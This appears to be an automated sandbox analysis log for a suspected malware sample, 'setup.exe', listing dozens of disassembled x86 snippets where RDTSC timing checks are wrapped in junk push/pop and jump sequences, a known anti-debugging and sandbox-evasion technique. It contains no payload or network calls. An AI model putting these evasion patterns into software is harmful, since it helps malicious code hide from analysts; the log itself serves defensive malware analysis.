Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4820 second address: EA4838 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF32CDD6566h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4838 second address: EA484A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484A second address: EA484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484E second address: EA485A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF32CFB71F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9AD0 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9ADD second address: EA9B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7202h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FF32CFB71FDh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9B07 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA024 second address: EAA028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1C6 second address: EAA1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D2 second address: EAA1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D6 second address: EAA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA4AA second address: EAA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E2D second address: DF8E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E45 second address: DF8E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF32CFB71F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB31F7 second address: EB3212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6577h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB976 second address: EBB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF32CFB71FCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB98F second address: EBB995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C41 second address: EB9C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF32CFB71F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C51 second address: EB9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C6F second address: EB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C73 second address: EB9C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA46B second address: EBA48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA48E second address: EBA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA79F second address: EBA7A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA8FA second address: EBA919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF32CDD6572h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA919 second address: EBA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA930 second address: EBA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA938 second address: EBA971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7207h 0x0000000e jl 00007FF32CFB71F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB969A second address: EB96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB96A2 second address: EB96B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF32CFB71F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC245C second address: EC2462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2462 second address: EC2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FF32CFB71F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2474 second address: EC2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2481 second address: EC2487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2487 second address: EC248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2151 second address: EC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FF32CFB7203h 0x0000000b pop esi 0x0000000c popad 0x0000000d jne 00007FF32CFB7218h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FF32CFB71FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ECF1E5 second address: ECF1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jng 00007FF32CDD6566h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BC8 second address: ED1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF32CFB71FDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE0 second address: ED1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE4 second address: ED1BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EB second address: EE51EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EF second address: EE520B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE520B second address: EE5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE503D second address: EE5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5046 second address: EE506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6571h 0x00000009 jno 00007FF32CDD6566h 0x0000000f jmp 00007FF32CDD656Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE506F second address: EE5074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5074 second address: EE507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE7A01 second address: EE7A0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FF32CFB71F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE917C second address: EE9195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6573h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE9195 second address: EE919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE919A second address: EE91DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007FF32CDD656Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FF32CDD6579h 0x0000001a pop edi 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e ja 00007FF32CDD6566h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91DB second address: EE91E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91E0 second address: EE9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD6572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB71F second address: EEB72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB72E second address: EEB734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB734 second address: EEB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A0D second address: EF1A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A11 second address: EF1A1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CFB71F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0376 second address: EF037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0635 second address: EF063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF063B second address: EF0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD6576h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0657 second address: EF0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF07C1 second address: EF0801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FF32CDD6574h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 jng 00007FF32CDD6578h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0984 second address: EF099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF099E second address: EF09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0C3A second address: EF0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF32CFB7201h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF523E second address: EF5250 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF32CDD656Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5250 second address: EF5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5254 second address: EF5259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5259 second address: EF5278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13EC0 second address: F13ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F13ECC second address: F13ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31818 second address: F3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3181C second address: F3182E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF32CFB71F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F3182E second address: F31840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31840 second address: F31844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F31F56 second address: F31F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320D9 second address: F320F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7203h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320F7 second address: F320FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F320FB second address: F32121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF32CFB7209h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F33F1C second address: F33F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36AFF second address: F36B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B04 second address: F36B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, si 0x0000000f movzx edx, cx 0x00000012 push 00000004h 0x00000014 or dh, 00000018h 0x00000017 pushad 0x00000018 add dword ptr [ebp+124610D8h], ecx 0x0000001e mov edi, 51B18799h 0x00000023 popad 0x00000024 push 1DB18ED8h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36B45 second address: F36B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F36E12 second address: F36E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: F382E3 second address: F382F6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CFB71FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0008 second address: 4DB000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB000C second address: 4DB0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0012 second address: 4DB0046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 call 00007FF32CDD6577h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF32CDD656Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0046 second address: 4DB0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0055 second address: 4DB005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005B second address: 4DB005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB005F second address: 4DB0063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB0063 second address: 4DB00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF32CFB7208h 0x00000014 jmp 00007FF32CFB7205h 0x00000019 popfd 0x0000001a call 00007FF32CFB7200h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00B2 second address: 4DB00FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF32CDD656Dh 0x00000013 pushfd 0x00000014 jmp 00007FF32CDD6570h 0x00000019 and eax, 661CAAA8h 0x0000001f jmp 00007FF32CDD656Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DB00FC second address: 4DB0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB7204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E36 second address: 4D90E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D90E3A second address: 4D90E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
